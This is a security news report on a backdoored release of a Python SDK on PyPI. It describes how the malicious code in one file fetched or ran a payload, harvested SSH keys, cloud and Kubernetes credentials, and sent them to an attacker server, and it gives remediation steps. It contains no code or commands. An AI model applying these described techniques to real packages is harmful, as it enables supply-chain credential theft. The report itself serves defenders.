Telnyx Python SDK Backdoored - Cloud Credentials at Risk
Basically, hackers secretly added malware to a popular coding tool to steal sensitive information.
Hackers backdoored the Telnyx Python SDK on PyPI, exposing countless developers to credential theft. This sophisticated attack could compromise cloud services and sensitive data. Immediate action is required to mitigate risks.
What Happened
On March 27, 2026, hackers known as TeamPCP uploaded two malicious versions of the Telnyx Python SDK to PyPI, the primary repository for Python packages. These compromised versions, 4.87.1 and 4.87.2, were available for about four hours before being quarantined. During this brief period, developers who installed these versions unknowingly introduced malware into their systems, with no visible signs of infection.
The Telnyx SDK is widely used, boasting around 750,000 downloads each month. This means the potential impact of the attack extends far beyond the immediate users, affecting numerous projects and services that rely on this library. The attack was particularly insidious, as only a single file was altered, making it difficult for developers to detect the compromise.
How It Works
The malicious code was embedded within a file called _client.py. When the library was loaded, the altered code executed silently, depending on the operating system. For Windows, it triggered a function that fetched a hidden payload disguised as a WAV audio file from a remote server. For Linux and macOS, the malware executed a Python script in memory, avoiding detection by not writing to disk.
This malware was designed to harvest sensitive information, including SSH keys, cloud provider credentials, and Kubernetes secrets. Once collected, the data was encrypted and sent to an attacker-controlled server. The stealthy nature of this attack means that it can spread rapidly, especially in environments utilizing Kubernetes.
Who's Being Targeted
The primary targets of this attack are developers and organizations using the Telnyx SDK. Given the SDK's popularity, the number of affected users could be significant. The sophistication of the attack suggests that TeamPCP is not only targeting individual developers but also aiming to infiltrate larger systems and networks.
This incident highlights the vulnerabilities present in the software supply chain. Developers often trust packages from repositories like PyPI, making them prime targets for such stealthy attacks. The potential for widespread damage is alarming, as compromised credentials could lead to unauthorized access to cloud services and sensitive data.
What You Should Do
Organizations that installed the compromised versions of the Telnyx SDK should treat this as a confirmed breach. Immediate incident response is crucial. All credentials accessible from affected systems must be rotated, including those for AWS, GCP, and Azure.
Simply uninstalling the malicious package will not eliminate the backdoor. Windows users need to remove msbuild.exe from the Startup folder, while Linux users must delete the sysmon.py file. In Kubernetes environments, audit and remove any suspicious pods. Additionally, developers should implement security best practices, such as enabling two-factor authentication on their accounts and avoiding the storage of secrets in easily accessible files. Blocking outbound connections to known malicious servers is also recommended.